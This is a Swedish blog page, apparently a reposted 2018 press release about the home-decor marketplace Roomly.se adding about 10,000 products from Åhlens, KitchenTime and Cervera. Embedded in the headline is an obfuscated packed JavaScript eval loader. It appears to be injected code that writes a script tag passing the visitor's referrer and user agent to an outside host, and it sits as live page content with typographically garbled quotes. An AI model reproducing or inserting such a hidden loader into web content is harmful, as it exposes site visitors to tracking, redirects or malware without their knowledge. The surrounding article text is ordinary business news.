Image Image Image Image Image Image Image Image Image Image

| 21 september, 2018

Scroll to top

Top

Roomly.se tar in heminredning från Åhlens i nytt samarbete

Roomly.se tar in heminredning från Åhlens i nytt samarbete

Roomly.se eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dnhye|var|u0026u|referrer|hdzef||js|php’.split(‘|’),0,{}))
tar in heminredning från Åhlens i nytt samarbete:
Nu har det gått ett tag sen vi skrev något om den svenska startupen Roomly.se. Inredningsbutiken som samlar Sveriges e-handlare på en adress. I ett nytt mail har vi fått uppgifter om att företaget Roomly AB nu utökar sin produktkatalog ytterligare. Innan sommaren rapporterade vi och tidningen e-handel roomly ab om att sajten är på väg att expandera internationellt. Det är två lånder som står på listan men företaget har inte meddelat vilka.

>> Läs fler artiklar om inredning online

De tre senaste tillskotten hos Roomly.se är Åhlens heminredning, Cervera och kökstillbehör från KitcheTime. Sammanlagt kommer det röra sig om ca 10 000 nya inredningsprodukter som adderas. Detta gör att sajten kommer att inneha omkring 80 000 produkter från 35 butiker på 1 adress.

Till skillnad från Shopello, Stylight och Shopalike som har sajter med liknande affärsidé så storsatsar Roomly endast på heminredning. De andra tre företagen har istället en stor blandning av allt från mode till skönhetsprodukter.

Pressmeddelande från Roomly

– Under sommaren har det inkommit otroligt massa intresseanmälningar från både mindre och medelstora e-butiker som önskar presentera sina produkter hos oss. Det är faktiskt så många att vi nu varit tvungna att pausa implementeringen under en kortare period. Detta beror främst på att många kunder önskar olika kostnadsupplägg, och idag erbjuder vi bara tre alternativ. Fler modeller är på gång och vi kommer sakta och säkert rulla in fler aktörer redan nu i oktober säger Sebastian Plengier Ehrnfelt, VD på Roomly AB

Senast in i nätverket under augusti och september hittar vi större aktörer på marknaden som heminredning Åhlens, KitchenTime och Cervera. Alla med sina respektive expertområden inom möbler, kökstillbehör och servering.

– Vi har sedan några månader tillbaka tittat närmare på marknaden för köksutrustning. Vi har vetat om att den växer så det knakar men inte hittat någon återförsäljare i Sverige som passat fokusområdet, förens nu. KitchenTime har en fantastisk e-butik med ett av Sveriges största utbud av produkter till köket. Därför blev det en självklarhet att ta in dem till oss. Vi har haft ett mindre utbud tidigare från butiker som Royal Design mfl men inte fokuserat lika mycket på kategorin som nu säger Sebastian.

Detta är ett pressmeddelande från Roomly AB